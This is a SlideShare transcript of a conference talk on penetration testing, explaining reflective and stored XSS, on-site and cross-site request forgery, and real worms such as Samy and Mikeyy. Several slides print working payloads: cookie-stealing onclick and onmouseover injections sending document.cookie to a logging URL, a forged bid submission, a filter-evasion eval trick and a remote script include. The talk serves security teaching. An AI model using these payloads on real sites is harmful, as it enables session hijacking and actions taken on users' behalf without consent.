Upcoming SlideShare
Loading in...5




This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.



Total Views
Views on SlideShare
Embed Views



0 Embeds 0

No embeds



Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    VodQA3_PenetrationTesting_AmitDhakkad VodQA3_PenetrationTesting_AmitDhakkad Presentation Transcript

    • AmitDhakad
      Application Developer
      Is considered a “survivor”
      Likes To Read About Black Magic & Illusions
    • What, why and how’s ofPenetration Testing
      - AmitDhakad
    • What do I plan to cover?
      What is Penetration Testing?
      What is it?
      Types of XSS
      Reflective XSS
      Stored XSS
      Request Forgery
      What is it?
      Types of Request Forgery
      On-site request forgery
      Cross-site request forgery
      Attack mechanisms
      Real world examples
      Why do we need to pay attention?
    • Penetration Testing
      Simulating a malicious attack on a system
    • Cross-site scripting (XSS)
      Injecting javascript through user-controllable fields
    • Reflective XSS
      Injecting javascript using url parameters
    • Diagram courtesy : The Web Application Hacker’s Handbook
    • Attack:http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)
    • Stored XSS
      Exploiting server’s ability to persist
    • Diagram courtesy : The Web Application Hacker’s Handbook
    • Attack:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
    • Request Forgery
      Perform unwitting actions on behalf of the user
    • On-site Request Forgery (OSRF)
      From same domain
    • Attack with XSS:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif“ onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
    • Attack without XSS:Image url is set to /bids?bid[amount]=500&bid[auction_id]=1
    • Cross-site Request Forgery (CSRF)
      From a different domain
    • Same origin policy
      A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.
      A page residing on one domain can load a script from another domain and execute this within its own context.
    • What can you do with XSS and Request Forgery?
      Session hijacking
      Performing arbitrary actions
      Disclosure of user data
    • Real world attacks
    • MySpace worm by Samy (XSS + OSRF)
      Bypassed all filters and added a script to his profile
      The script did two things:
      Added the visiting user as a friend
      The script got copied into the user’s profile
      Anyone visiting the new infected user also got added as Samy’s friend.
      • Protection:
      • MySpace strips out the word "onreadystatechange" which is necessary for XML-HTTP requests
      • Attack:
      • eval('xmlhttp.onread' + 'ystatechange = callback');
    • Ebay – discovered by Dave Armstrong (OSRF)
      Crafted url set as image url
      Arbitrary bid was placed on behalf of the visiting user
    • Mikeyy twitter worm (XSS + OSRF)
      Implemented by a 17-year old boy
      -- "<script src="http://www.stalkdaily.com/ajax.js"></script>"
      Visiting user got infected
      Infected users began twitting unwittingly.
    • Gmail vulnerability – discovered by PetkoPetkov (CSRF)
      Add filter to forward all emails to the attacker’s email address
    • Why we need to pay attention?
      Shift is towards attacking clients
      Technologies don’t provide strong protection
      Considered as lame attacks
      Identification using automated tools is difficult
      Penetration testing is considered as a separate vertical
    • Break your own walls before anyone else does it
    • Q & A
    • Thank you